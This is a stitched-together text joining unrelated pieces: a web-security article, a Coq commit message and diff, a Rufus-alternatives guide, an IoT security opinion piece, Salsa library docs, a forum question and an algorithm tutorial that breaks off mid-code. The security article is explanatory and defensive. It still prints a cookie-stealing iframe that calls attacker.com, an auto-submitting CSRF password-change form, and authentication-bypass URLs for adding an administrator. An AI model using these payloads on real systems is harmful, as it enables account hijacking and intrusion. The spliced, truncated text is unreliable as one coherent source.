People often make mistakes because of negligence, and developers and system administrators are no exception to this rule. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with improper content types that will be downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a Web application has to make a quick change on the production server. They create a backup of the script they are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it will still represent a security issue, because the backup file will most probably be downloaded by whoever accesses it.

In another scenario, the Web application may use a Rich Text Editor, such as FCKeditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP are placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly.

Probably the most common and overlooked vulnerability is:

XSS – Exploiting the User

There are situations in which the Web application allows us to get to the server through the user. XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts, which are executed in the context of the browser of the Web application user. This is due to improper validation of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-persistent (reflected).

Persistent XSS attacks store the injected code on the server, and it is executed each time the page is displayed to the visitors. Here is an example scenario that uses stored XSS to get the cookie of a Web application user:

• The attacker creates a script on their server that will collect the cookies.
• The attacker injects the following hidden iframe in the application:

  <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="attacker.com/get_cookies.php?cookie=" + document.cookie)></iframe>

• An authenticated user loads the page that contains the iframe.
• The cookie is sent to the script, which writes it to a file or a database.
• The attacker loads the cookie in their browser and is able to authenticate as the user.

Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user into following a link.

Although XSS attacks usually attempt to steal cookies, this is not always the case. They may be used to target the passwords saved in the browser, and let's not forget BeEF. This means that setting the HttpOnly flag is not enough to protect the Web application users from XSS attacks. The best protection is validating and sanitizing the input and the output of the application, alongside tightened cookie security policies.
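On the output side, that advice boils down to encoding every user-controlled value before it is echoed into HTML. A minimal sketch (illustrative code, not from the original article):

  <?php
  // Encode user-controlled data before writing it into the page.
  // ENT_QUOTES also encodes single quotes, which matters inside
  // HTML attribute values.
  function e($value)
  {
      return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
  }

  echo '<p>Hello, ' . e($_GET['name']) . '</p>';
  ?>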
A close relative of the XSS is:

XSRF – Exploiting the Browser

In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack is a hybrid between an XSS and a LFI attack. XSRF attacks are a way to issue commands from a user that the Web application trusts. Suppose we have a page in our Web application where the users can change their passwords. If the form is vulnerable to XSRF, the attacker can exploit this vulnerability to reset the password of the user. Here is how such an attack takes place:

• The attacker creates their own form on their server:

  <html>
  <head></head>
  <body onLoad="javascript:document.password_form.submit()">
  <form action="https://target.com/admin/admin.php?" method=post name="password_form">
  <input type=hidden name=a value=change_password>
  <input type=password name=password1 VALUE="new_pass">
  <input type=password name=password2 VALUE="new_pass">
  </form>
  </body>
  </html>

• The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form.
• The attacker tricks the user into accessing the page (the user has to have an active session with the Web application).
• The form submits the data to the server, effectively changing the password.

The only difficult thing in the attack is to trick the user into visiting the page while being logged in to the application. This may be achieved with a spoofed e-mail, an instant message, and so on. To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, sensitive user actions, such as changing a password, should require additional confirmation – usually, the users should enter their old passwords.
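A minimal sketch of such an anti-XSRF token (illustrative; the session key, form names, and script name are assumptions, and the OpenSSL extension is assumed to be available):

  <?php
  session_start();

  // Generate a per-session token once and embed it in every form.
  if (empty($_SESSION['xsrf_token'])) {
      $_SESSION['xsrf_token'] = bin2hex(openssl_random_pseudo_bytes(16));
  }

  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
      // Reject any POST whose token does not match the session's token.
      if (!isset($_POST['xsrf_token'])
          || $_POST['xsrf_token'] !== $_SESSION['xsrf_token']) {
          die('Invalid request.');
      }
      // ... process the password change ...
  }
  ?>
  <form method="post" action="change_password.php">
    <input type="hidden" name="xsrf_token"
           value="<?php echo $_SESSION['xsrf_token']; ?>">
    ...
  </form>

Since the attacker's page cannot read the victim's session, it cannot supply a matching token, and the forged POST is rejected.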
Both XSS and CSRF attacks attempt to steal user accounts. This can also be achieved by attacking the:

Authentication and Authorization – Exploiting the Implementation

We all know that assumptions are bad, but we still continue to assume. Fairly often, the developers of an application make assumptions about how the authorization and the authentication of the users should work. These assumptions are sometimes wrong, and malicious users can conduct actions that do not match whatever the developers have taken for granted.

Let's take one of the most famous shopping cart scripts as an example. Here is how the administrators of the application log in to the administrative interface:

• The administrator accesses http://target.com/catalog/admin.
• The script redirects to the login.php script.
• The administrator enters their login credentials.
• The script checks the login credentials.
• If they are correct, the administrator is logged in.
• If they are not correct, the script asks the user for their login credentials again.

This is achieved by showing the login.php script to every unauthenticated user of the application. Let's see part of the code of the script. The login.php script contains the following code:

  require('includes/application_top.php');

and here is the part of the application_top.php script that checks if the user is authenticated:

  // redirect to login page if administrator is not yet logged in
  if (!tep_session_is_registered('admin')) {
      $redirect = false;
      $current_page = basename($PHP_SELF);
      if ($current_page != FILENAME_LOGIN) {
          if (!tep_session_is_registered('redirect_origin')) {
              tep_session_register('redirect_origin');
              $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS);
          }
          $redirect = true;
      }
      if ($redirect == true) {
          tep_redirect(tep_href_link(FILENAME_LOGIN));
      }
      unset($redirect);
  }

What it basically does is check whether the basename of $PHP_SELF is login.php. If it is login.php, then it serves the page; otherwise you will be redirected to login.php. Now, imagine that the attacker accesses the following URL:

  http://target.com/catalog/admin/file_manager.php/login.php

The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which is, of course, file_manager.php. The attacker can also make a POST request to

  http://target.com/catalog/admin/administrators.php/login.php?action=insert

and add themselves as a site administrator, upload a Web shell, and so on, and so forth.

Such vulnerabilities are due to mistakes in the programming. They are a bit harder for attackers to detect, but they are extremely unpleasant, as they give unauthenticated users access to the application. To avoid these vulnerabilities, the logic of the application has to be very well planned, and the implementation should be thoroughly tested.

Of course, there are other vulnerabilities, and attacks that are hybrids of the attacks described above. There is no post that can encompass them all. But we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays. In a follow-up post we will discuss the defense, and penetration tests as part of the defense.

This article has been translated into Serbo-Croatian by Anja Skrba from Webhostinggeeks.com.
Commit 7d7c9871, authored by Robbert Krebbers

Set Hint Mode for all classes in `base.v`.

This provides significant robustness against looping type class search.

As a consequence, at many places throughout the library we had to add additional typing information to lemmas. This was to be expected, since most of the old lemmas were ambiguous. For example:

  Section fin_collection.
    Context `{FinCollection A C}.

    size_singleton (x : A) : size {[ x ]} = 1.

In this case, the lemma does not tell us which `FinCollection` with elements `A` we are talking about. So, `{[ x ]}` could not only refer to the singleton operation of the `FinCollection A C` in the section, but also to any other `FinCollection` in the development. To make this lemma unambiguous, it should be written as:

  Lemma size_singleton (x : A) : size ({[ x ]} : C) = 1.

In similar spirit, lemmas like the one below were also ambiguous:

  Lemma lookup_alter_None {A} (f : A → A) m i j :
    alter f i m !! j = None ↔ m !! j = None.

It is not clear which finite map implementation we are talking about. To make this lemma unambiguous, it should be written as:

  Lemma lookup_alter_None {A} (f : A → A) (m : M A) i j :
    alter f i m !! j = None ↔ m !! j = None.

That is, we have to specify the type of `m`.

parent 24aef2fe
base.v
@@ -94,6 +94,9 @@
 (** We define an operational type class for setoid equality. This is based on
 (Spitters/van der Weegen, 2011). *)
 Class Equiv A := equiv: relation A.
+(* No Hint Mode set because of Coq bug #5735
+Hint Mode Equiv ! : typeclass_instances. *)
 Infix "≡" := equiv (at level 70, no associativity) : C_scope.

 Class LeibnizEquiv A `{Equiv A} := leibniz_equiv x y : x ≡ y → x = y.
+Hint Mode LeibnizEquiv ! - : typeclass_instances.

 Class Decision (P : Prop) := decide : {P} + {¬P}.
+Hint Mode Decision ! : typeclass_instances.

 Class Inhabited (A : Type) : Type := populate { inhabitant : A }.
+Hint Mode Inhabited ! : typeclass_instances.

 Class ProofIrrel (A : Type) : Prop := proof_irrel (x y : A) : x = y.
+Hint Mode ProofIrrel ! : typeclass_instances.

[The same `Hint Mode … : typeclass_instances.` line is added after each of the remaining classes in `base.v`: Empty, Top, Union, Intersection, Difference, Singleton, SubsetEq, Lexico, ElemOf, Disjoint, DisjointE, DisjointList, Filter, UpClose, Lookup, SingletonM, Insert, Delete, Alter, PartialAlter, Dom, Merge, UnionWith, IntersectionWith, DifferenceWith, LookupE, InsertE, Elements, Size, Fresh, and Half.]

[In `coPset`, `collections.v`, and `fin_collections.v`, lemma and instance statements gain the explicit type annotations the commit message describes, for example:]

-Lemma coPset_split X :
+Lemma coPset_split (X : coPset) :

-Global Instance set_unfold_empty x : SetUnfold (x ∈ ∅) False.
+Global Instance set_unfold_empty x : SetUnfold (x ∈ (∅ : C)) False.

-Lemma elem_of_singleton_1 x y : x ∈ {[y]} → x = y.
+Lemma elem_of_singleton_1 x y : x ∈ ({[y]} : C) → x = y.
Is There Rufus for Linux?

Introduction

In the world of software tools, Rufus has gained a stellar reputation for creating bootable USB drives efficiently and effectively. But the burning question on the minds of Linux users is, "Is there Rufus for Linux?" In this detailed guide, we will delve into this topic, providing you with valuable insights, step-by-step instructions, and expert opinions.

Is there Rufus for Linux?

Let's address the burning question first: Rufus is not available as a native Linux application. However, Linux users need not despair, as there are alternative tools that can serve as excellent replacements for Rufus on a Linux platform.

Exploring Rufus Alternatives for Linux

While Rufus may not have a dedicated Linux version, several alternative tools can accomplish similar tasks with ease. These tools are specifically designed to work seamlessly with Linux distributions. Here are some noteworthy Rufus alternatives for Linux:

1. Balena Etcher: This open-source tool is a popular choice among Linux users for creating bootable USB drives. Its user-friendly interface and compatibility with various Linux distributions make it an excellent option.
2. UNetbootin: UNetbootin is another reliable choice that supports Linux. It allows you to create bootable USB drives with ease and offers compatibility with a wide range of Linux distributions.
3. dd Command: For command-line enthusiasts, the 'dd' command can be a powerful tool to create bootable USB drives on Linux. It requires some knowledge of the command line but provides precise control.
4. Ventoy: Ventoy is a unique bootable USB drive creator that works well with Linux. What sets it apart is its ability to create multi-boot USB drives, allowing you to store multiple ISOs on a single drive.
5. Rufus through Wine: While not a native Linux application, some users have reported success running Rufus on Linux using Wine, a compatibility layer. However, this method may not work flawlessly for everyone.

How to Use Rufus Alternatives on Linux

Now that we've explored Rufus alternatives, let's dive into using one of them, Balena Etcher, as an example:

1. Download Balena Etcher: Visit the official Balena Etcher website and download the Linux version compatible with your distribution.
2. Install Balena Etcher: Once downloaded, install Balena Etcher on your Linux system by following the installation instructions provided on their website.
3. Launch Balena Etcher: After installation, launch the application.
4. Select ISO Image: Click on the "Select Image" button and choose the ISO file you want to create a bootable USB drive from.
5. Insert USB Drive: Insert your USB drive into your computer's USB port.
6. Choose Target Drive: In Balena Etcher, select the USB drive as the target for your bootable image.
7. Start the Process: Click the "Flash!" button to start the process. Balena Etcher will create a bootable USB drive from the ISO image.
8. Eject and Use: Once the process is complete, safely eject the USB drive and use it to boot your Linux system.

FAQs

Can I use Rufus on Linux?
No, Rufus does not have a native Linux version. However, there are alternative tools available that can be used to create bootable USB drives on Linux, as mentioned in this guide.

Is Balena Etcher compatible with all Linux distributions?
Yes, Balena Etcher is compatible with a wide range of Linux distributions, making it a versatile choice for creating bootable USB drives.

Are there any command-line options for creating bootable USB drives on Linux?
Yes, Linux users can use the 'dd' command, a powerful command-line tool, to create bootable USB drives with precision and control.
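For example (a sketch only – the ISO path and the device name /dev/sdX are placeholders, and writing to the wrong device will destroy its data, so identify your USB drive first, e.g. with lsblk):

  sudo dd if=~/Downloads/linux-distro.iso of=/dev/sdX bs=4M status=progress && sync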
Are there any command-line options for creating bootable USB drives on Linux? Yes, Linux users can utilize the 'dd' command, a powerful command-line tool, to create bootable USB drives with precision and control. Can I create a multi-boot USB drive on Linux? Yes, Ventoy is a tool that allows you to create multi-boot USB drives on Linux, enabling you to store and boot from multiple ISOs on a single drive. Is Wine a reliable option to run Rufus on Linux? Wine can be used to run Rufus on Linux, but it may not work seamlessly for all users. It's advisable to explore native Linux alternatives for a smoother experience. Is it safe to create bootable USB drives on Linux? Creating bootable USB drives on Linux is safe as long as you follow the instructions carefully, use reputable tools like Balena Etcher or UNetbootin, and double-check that you are writing to the correct drive. Is there a Rufus version for Linux? No. Rufus is designed for Windows and does not have a native Linux version. What is the Linux equivalent of Rufus? A popular Linux equivalent of Rufus is balenaEtcher (formerly known simply as "Etcher"), which is used for creating bootable USB drives on Linux systems. Conclusion While Rufus may not have a dedicated Linux version, Linux users have a variety of alternative tools at their disposal to create bootable USB drives effortlessly. In this guide, we explored Rufus alternatives, with a focus on Balena Etcher, and provided step-by-step instructions to get you started. Linux enthusiasts can continue to enjoy the benefits of creating bootable USB drives without the need for Rufus.
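As a postscript to the 'dd' discussion above: the snippet below is a minimal, illustrative Python sketch of what image-writing tools do at their core, streaming an ISO to a block device in fixed-size chunks. It is not part of any of the tools discussed in this guide; the file and device paths are placeholders, and on a real system you would need root privileges and, above all, the correct target device.

import os

iso_path = "linux.iso"        # placeholder input image
device_path = "/dev/sdX"      # placeholder target device; picking the wrong one destroys its data
chunk_size = 4 * 1024 * 1024  # 4 MiB per write, akin to dd's bs= option

with open(iso_path, "rb") as src, open(device_path, "wb") as dst:
    while True:
        chunk = src.read(chunk_size)
        if not chunk:
            break
        dst.write(chunk)
    dst.flush()                # flush Python's own buffer
    os.fsync(dst.fileno())     # ask the OS to finish writing to the device

This is exactly why the guide recommends graphical tools like Balena Etcher for most users: they add device detection and verification on top of this raw copy loop.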
Cellular technology can improve IoT security

The recent hijacking of thousands of printers to print out propaganda for the popular YouTuber PewDiePie gave us insight into the direction of the IoT ecosystem and what security breaches mean in an increasingly connected world. The attack, while generally harmless, underscores the need for cybersecurity protocols and policies that address the vulnerability of IoT devices and their increasing potential to cause damage if they are compromised.

The tremendous growth in smart, connected devices in our industry, homes and on people shows no signs of slowing down. There are now far more connected devices in the world than there are people. From personal devices to industrial ones, the growing ubiquity of always-connected devices is leading to a modern-day gold rush of sorts. The commodity in question is not gold; it's the data these devices generate, data that, with analysis, can highlight trends and behaviors that allow for a vast new range of use cases across the IoT ecosystem.

Ensuring the security of these devices is already at the forefront of cybersecurity. However, maintaining the privacy of this data gets less attention, despite being critical to continued consumer trust in these technologies. In many cases, data from a specific device is sent to and stored in the cloud. Often, an IoT device manufacturer will have a data repository hosted in one or more cloud service provider (CSP) instances. All data generated from individual devices is sent to these repositories for storage and analysis. This data requires protection not only at rest, but also in transit. That's an area where the innate security built into cellular technologies, end-to-end, can play a pivotal role.

Innate cellular security

Cellular networks are less permeable simply because they tend to have fewer connected IoT devices than Wi-Fi and wired networks, since many always-connected devices employ Wi-Fi connectivity. The most common cellular networks also require authentication to connect to the network, even if that authentication is automated with hardware. Many Wi-Fi and wired networks require no such authentication and therefore present far more vulnerability. In addition to authenticating connected devices, cellular data is more difficult to intercept. Grabbing an RF signal or creating a fake, malicious cellular network requires more hardware than a computer with a Wi-Fi card. A further inherent advantage is that there are fewer bad actors attempting to break into cellular networks, since other network types offer easier access to just as much data.

Cellular technology can also play a more active role in securing data. When static accounts are compromised, mobile devices are usually unaffected. So, cellular technology offers protection through two-factor authentication or as part of a three- or four-factor authentication system. IoT manufacturers can exploit the security of cellular data transmission by performing device-to-device communication with cellular connectivity. This reduces the number of devices on wireless networks and minimizes the surface area for cyberattacks. In the past, transmitting large quantities of data exclusively through cellular networks was too slow to be practical.
As cellular technology has improved, networks built entirely on cellular data transmission have become viable, and companies have built private cellular networks to reap the security benefits of cellular technology. But even when data is not transmitted over purely cellular networks, data collected by IoT systems is more secure when cellular technology is part of the equation.

The move to private LTEs

While cellular networks may be more secure, some may argue that their support for IoT is limited by cost, spectrum availability and their prioritization of mobile devices. They simply were not designed to handle the growing diversity of devices (the advent of 5G technologies will go a long way in addressing this). This is why wireless networking is still a fragmented landscape in business-critical domains. The concept of private LTE networks then becomes a viable option, enabling IoT-specific connectivity for organizations with clusters of IoT devices and a need to transmit and store collected data in CSP instances. While commercial LTE networks are typically focused on mobile consumer needs, private LTE networks can be set up relatively inexpensively. These LTE networks provide the range and bandwidth for device-to-device communication and data transfer to a larger backbone network, where data can be aggregated and transferred to a CSP instance for storage and analysis.

This means that the ground-level networks, where a majority of the data is freely transmitted, are less permeable. The only place where the data is vulnerable to traditional cyberattacks is after it has transitioned to an IP network, where private connections to the CSP environment can be provisioned to minimize vulnerabilities. This innate security also reduces the vulnerability of backbone networks, since it minimizes the risk of a breach at the last mile of the data pipeline. Essentially, private LTE networks provide a more secure environment for IoT data, and protect backbone networks, while the data is still in use by IoT devices, where it would be most open to attack on traditional Wi-Fi or wired networks.

Moving to cellular

The tendency of many companies and IoT manufacturers is to default to non-cellular networks for internal and external data transfer. But these networks will continue to become more penetrable as IoT grows and more devices present access points to the network backbone. IoT device manufacturers can improve their own data security and drive a more secure future for IoT as a whole with a transition to private LTEs and end-to-end encryption for transferring data to and from CSP environments.

All IoT Agenda network contributors are responsible for the content and accuracy of their posts. Opinions are of the writers and do not necessarily convey the thoughts of IoT Agenda.
How Salsa works

This chapter is based on the explanation given by Niko Matsakis in this video about Salsa. Salsa is not used directly in rustc, but it is used extensively for rust-analyzer and may be integrated into the compiler in the future.

What is Salsa?

Salsa is a library for incremental recomputation. This means it allows reusing computations that were already done in the past to increase the efficiency of future computations.

The objectives of Salsa are:
• Provide that functionality in an automatic way, so reusing old computations is done automatically by the library
• Doing so in a "sound", or "correct", way, therefore leading to the same results as if it had been done from scratch

Salsa's actual model is much richer, allowing many kinds of inputs and many different outputs. For example, integrating Salsa with an IDE could mean that the inputs could be the manifest (Cargo.toml), entire source files (foo.rs), snippets and so on; the outputs of such an integration could range from a binary executable, to lints, types (for example, if a user selects a certain variable and wishes to see its type), completions, etc.

How does it work?

The first thing that Salsa has to do is identify the "base inputs" [1]. Then Salsa has to also identify intermediate, "derived" values, which are something that the library produces, but, for each derived value, there's a "pure" function that computes the derived value. For example, there might be a function ast(x: Path) -> AST. The produced AST isn't a final value, it's an intermediate value that the library would use for the computation.

This means that when you try to compute with the library, Salsa is going to compute various derived values, and eventually read the inputs and produce the result for the requested computation. In the course of computing, Salsa tracks which inputs were accessed and which values were derived. This information is used to determine what's going to happen when the inputs change: are the derived values still valid? This doesn't necessarily mean that each computation downstream from the input is going to be checked, which could be costly. Salsa only needs to check each downstream computation until it finds one that hasn't changed. At that point, it won't check other derived computations since they wouldn't need to change.

It is helpful to think about this as a graph with nodes. Each derived value has a dependency on other values, which could themselves be either base or derived. Base values don't have a dependency.

I <- A <- C ...
          |
J <- B <--+

When an input I changes, the derived value A could change. The derived value B, which does not depend on I, A, or any value derived from A or I, is not subject to change. Therefore, Salsa can reuse the computation done for B in the past, without having to compute it again.

The computation could also terminate early. Keeping the same graph as before, say that input I has changed in some way (and input J hasn't) but, when computing A again, it's found that A hasn't changed from the previous computation. This leads to an "early termination", because there's no need to check if C needs to change, since both of C's direct inputs, A and B, haven't changed.

Key Salsa concepts

Query

A query is some value that Salsa can access in the course of computation. Each query can have a number of keys (from 0 to many), and all queries have a result, akin to functions. 0-key queries are called "input" queries.
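As an aside before the remaining concepts: here is a toy sketch of the revalidation idea described in the graph discussion above. It is written in Python purely for illustration and has nothing to do with Salsa's real API or implementation; it only shows the core trick of recording which inputs a derived value read, and recomputing it only when one of those inputs has changed.

class ToyDB:
    def __init__(self):
        self.inputs = {}    # input name -> (value, revision it was set at)
        self.revision = 0   # global change counter
        self.cache = {}     # query name -> (value, {input name: revision seen})

    def set_input(self, name, value):
        self.revision += 1
        self.inputs[name] = (value, self.revision)
        # No eager recomputation: derived values are revalidated lazily on demand.

    def _read_input(self, name, reads):
        value, rev = self.inputs[name]
        reads[name] = rev   # record the dependency and the revision we saw
        return value

    def query(self, name, compute):
        cached = self.cache.get(name)
        if cached is not None:
            value, reads = cached
            # Still valid if every input read last time is unchanged.
            if all(self.inputs[k][1] == rev for k, rev in reads.items()):
                return value
        reads = {}
        value = compute(lambda k: self._read_input(k, reads))
        self.cache[name] = (value, reads)
        return value

db = ToyDB()
db.set_input("I", 1)
db.set_input("J", 2)
a = db.query("A", lambda get: get("I") * 10)  # computed: reads I
a = db.query("A", lambda get: get("I") * 10)  # reused: I unchanged
db.set_input("J", 3)                          # J changed, but A never read J
a = db.query("A", lambda get: get("I") * 10)  # still reused, like B in the graph above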
Database

The database is basically the context for the entire computation; it's meant to store Salsa's internal state, all intermediate values for each query, and anything else that the computation might need. The database must know all the queries that the library is going to do before it can be built, but they don't need to be specified in the same place.

After the database is formed, it can be accessed with queries that are very similar to functions. Since each query's result is stored in the database, when a query is invoked N times, it will return N cloned results, without having to recompute the query (unless the input has changed in such a way that it warrants recomputation). For each input query (0-key), a "set" method is generated, allowing the user to change the output of such query, and trigger previously memoized values to be potentially invalidated.

Query Groups

A query group is a set of queries which have been defined together as a unit. The database is formed by combining query groups. Query groups are akin to "Salsa modules" [2]. A set of queries in a query group are just a set of methods in a trait. To create a query group, a trait annotated with a specific attribute (#[salsa::query_group(...)]) has to be created. An argument must also be provided to said attribute, as it will be used by Salsa to create a struct to be used later when the database is created.

Example input query group:

/// This attribute will process this tree, produce this tree as output, and produce
/// a bunch of intermediate stuff that Salsa also uses. One of these things is a
/// "StorageStruct", whose name we have specified in the attribute.
///
/// This query group is a bunch of **input** queries, that do not rely on any
/// derived input.
#[salsa::query_group(InputsStorage)]
pub trait Inputs {
    /// This attribute (`#[salsa::input]`) indicates that this query is a base
    /// input, therefore `set_manifest` is going to be auto-generated
    #[salsa::input]
    fn manifest(&self) -> Manifest;

    #[salsa::input]
    fn source_text(&self, name: String) -> String;
}

To create a derived query group, one must specify which other query groups this one depends on by specifying them as supertraits, as seen in the following example:

/// This query group is going to contain queries that depend on derived values. A
/// query group can access another query group's queries by specifying the
/// dependency as a supertrait. Query groups can be stacked as much as needed
/// using that pattern.
#[salsa::query_group(ParserStorage)]
pub trait Parser: Inputs {
    /// This query `ast` is not an input query, it's a derived query; this means
    /// that a definition is necessary.
    fn ast(&self, name: String) -> String;
}

When creating a derived query, the implementation of said query must be defined outside the trait. The definition must take a database parameter as an impl Trait (or dyn Trait), where Trait is the query group that the definition belongs to, in addition to the other keys.

/// This is going to be the definition of the `ast` query in the `Parser` trait.
/// So, when the query `ast` is invoked, and it needs to be recomputed, Salsa is
/// going to call this function and give it the database as `impl Parser`.
/// The function doesn't need to be aware of all the queries of all the query groups.
fn ast(db: &impl Parser, name: String) -> String {
    // Note: `impl Parser` is used here, but `dyn Parser` works just as well.
    /* code */
    // Because the database is passed as an `impl Parser`, this call is allowed:
    let source_text = db.source_text(name);
    /* do the actual parsing */
    return ast;
}

Eventually, after all the query groups have been defined, the database can be created by declaring a struct. To specify which query groups are going to be part of the database, an attribute (#[salsa::database(...)]) must be added. The argument of said attribute is a list of identifiers, specifying the query groups' storage structs.

/// This attribute specifies which query groups are going to be in the database.
#[salsa::database(InputsStorage, ParserStorage)]
#[derive(Default)] // optional!
struct MyDatabase {
    /// You also need this one field.
    runtime: salsa::Runtime<MyDatabase>,
}

/// And this trait has to be implemented.
impl salsa::Database for MyDatabase {
    fn salsa_runtime(&self) -> &salsa::Runtime<MyDatabase> {
        &self.runtime
    }
}

Example usage:

fn main() {
    let mut db = MyDatabase::default();
    db.set_manifest(...);
    db.set_source_text(...);
    loop {
        db.ast(...); // will reuse results
        db.set_source_text(...);
    }
}

[1] "They are not something that you [inaudible] but something that you kinda get [inaudible] from the outside" (3:23).

[2] What is a Salsa module?
Who is a Technology Enthusiast?

People who love technology are often referred to as technophiles, 'techies', and 'netizens'. People who enjoy using computers and other technology may also refer to themselves as 'cybernauts,' 'cyberjunkies,' and 'netheads.' But there's also a term for someone who despises technology: a 'Luddite'. That term has interesting origins in the early 1800s: it comes from the Luddites, English textile workers who protested against the new machinery of the Industrial Revolution.

A technology enthusiast is a person who loves using computers and other electronics, and is more knowledgeable about the products than the average consumer. These people are like "prosumers": they spend time learning about these products before purchasing them. Despite their love for technology, many people aren't aware that the label applies to them, because technology lovers are more than just geeks; there are people who love technology, and it's not necessarily the case that they're geeks.

A technophile is a person who keeps up with technology and is passionate about technological advances. Such a person is typically an expert in a particular field, and their knowledge is generally vast, though they are often viewed as socially inept and lacking other interests. Ultimately, a techie is someone who is passionate about technology, is willing to learn about new developments, has a high level of technical expertise, and will use technology to help others.
Search found 1 match

by panecho, 11 Oct 2021, 10:30
Forum: Feature requests
Topic: frequency of different sensors
Replies: 1
Views: 3598

frequency of different sensors

Does CoppeliaSim execute different child scripts at the same rate, i.e. the rate specified at the top of the UI? For example, if I have an IMU and a laser working in the same scene, is it possible to execute the child script associated with each sensor object at its own rate, independently?
HARD DATA STRUCTURES AND ALGORITHMS

How to Solve Transformation Dictionary

Written By Adam Bhula

Transformation Dictionary Introduction

The Transformation Dictionary problem asks us to transform one word into another word by changing only a fixed number of characters at a time. This problem requires careful analysis of the dictionary of words, efficient traversal techniques (either bidirectional BFS with the use of sets, or graph traversal), and consideration of the fixed number of character changes. This problem also requires consideration of real-world applications and transforming your solution into a functioning API for a given use case.

Transformation Dictionary Problem

Given a dictionary of words, determine whether it is possible to transform a given word into another with a fixed number of characters.

Follow-up Question #1: How would you modify it to accept insertions/deletions of 1 character (accepting changing lengths of chars)?

Follow-up Question #2: How would you modify this to be an API to handle a large amount of dictionary words but only a few checks for transforming?

Example Inputs and Outputs

Example 1
Input: start = 'dog', end = 'hat', dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig']
Output: True

Example 2
Input: start = 'abc', end = 'xyz', dictionary = ['abc', 'def', 'ghi']
Output: False

Example 3
Input: start = 'hit', end = 'cog', dictionary = ['hot', 'dot', 'dog', 'lot', 'log', 'cog']
Output: True

Transformation Dictionary Solutions

To begin, it's important to note that this problem can be, and often is, solved by constructing a graph representation of the dictionary, where each word is a node and there is an edge between two words if they differ by exactly one character. We then perform a breadth-first search (BFS) traversal from the start word, exploring its neighboring words until it reaches the end word or exhausts all possibilities. However, for our solution we will opt for a more efficient approach.

To solve this problem, we can use a bidirectional breadth-first search (BFS) approach. To better visualize our approach, imagine we are searching for a path from the start word to the end word (and also the reverse), considering each word in the dictionary as a potential step in the transformation process.

We start by initializing our data structures. We maintain two sets to keep track of the words visited from both the start and end points. Initially, the sets only contain the start and end words, respectively. We also have two queues, one for the start words and another for the end words, to perform the BFS from both ends simultaneously.

In each iteration, we choose a word from either the start queue or the end queue, alternating between them. We explore the neighbors of the chosen word by comparing it with each word in the dictionary. To compare two words for a one-character difference, we check if the words have the same length and count the number of differing characters between them. If the count is exactly 1, it means the words are neighbors in the transformation process. If a neighbor is found to be one character away from the chosen word and has not been visited from the opposite end, we have discovered a valid step in the transformation path. We add the neighbor to the corresponding visited set and enqueue it into the respective queue for future exploration.
We continue this process, enqueuing newly discovered neighbors and updating the visited sets, until we either find a common word or both queues become empty, indicating that no transformation path exists. By exploring the search space from both ends, we can optimize the search process and improve overall efficiency. We'll also have to deal with two extension questions that require us to modify our solution later on. First, let's take a look at our original solution below.

from collections import deque

def isTransformable(start, end, dictionary):
    if start == end:
        return True

    # Create sets to keep track of visited words from both ends
    visited_start = set([start])
    visited_end = set([end])

    # Create queues to perform BFS from both ends
    queue_start = deque([start])
    queue_end = deque([end])

    while queue_start and queue_end:
        # Perform BFS from the start word
        if len(queue_start) <= len(queue_end):
            word = queue_start.popleft()
            neighbors = getNeighbors(word, dictionary)
            for neighbor in neighbors:
                if neighbor in visited_end:
                    return True
                if neighbor not in visited_start:
                    visited_start.add(neighbor)
                    queue_start.append(neighbor)
        # Perform BFS from the end word
        else:
            word = queue_end.popleft()
            neighbors = getNeighbors(word, dictionary)
            for neighbor in neighbors:
                if neighbor in visited_start:
                    return True
                if neighbor not in visited_end:
                    visited_end.add(neighbor)
                    queue_end.append(neighbor)

    return False

def getNeighbors(word, dictionary):
    neighbors = []
    for neighbor in dictionary:
        if len(word) == len(neighbor):
            diff_count = sum(a != b for a, b in zip(word, neighbor))
            if diff_count == 1:
                neighbors.append(neighbor)
    return neighbors

start = 'dog'
end = 'hat'
dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig']
print(isTransformable(start, end, dictionary))  # Output: True

Follow-up Question #1

How would you modify it to accept insertions/deletions of 1 character (accepting changing lengths of chars)?

To handle insertions and deletions, we can modify the code to generate all possible neighboring words by considering three cases: changing a character, inserting a character, and deleting a character. We can modify our getNeighbors function to handle the cases in which words are 1 character apart. If two words differ in length by 1 and the shorter can be obtained from the longer by deleting a single character, then we can travel between those words. We could also generalize the function to handle any number of character insertions/deletions by adjusting the value 1 to an arbitrary number.
from collections import deque

def isTransformable(start, end, dictionary):
    if start == end:
        return True

    # Create sets to keep track of visited words from both ends
    visited_start = set([start])
    visited_end = set([end])

    # Create queues to perform BFS from both ends
    queue_start = deque([start])
    queue_end = deque([end])

    while queue_start and queue_end:
        # Perform BFS from the start word
        if len(queue_start) <= len(queue_end):
            word = queue_start.popleft()
            neighbors = getNeighbors(word, dictionary)
            for neighbor in neighbors:
                if neighbor in visited_end:
                    return True
                if neighbor not in visited_start:
                    visited_start.add(neighbor)
                    queue_start.append(neighbor)
        # Perform BFS from the end word
        else:
            word = queue_end.popleft()
            neighbors = getNeighbors(word, dictionary)
            for neighbor in neighbors:
                if neighbor in visited_start:
                    return True
                if neighbor not in visited_end:
                    visited_end.add(neighbor)
                    queue_end.append(neighbor)

    return False

def getNeighbors(word, dictionary):
    neighbors = []
    for neighbor in dictionary:
        if len(word) == len(neighbor):
            diff_count = sum(a != b for a, b in zip(word, neighbor))
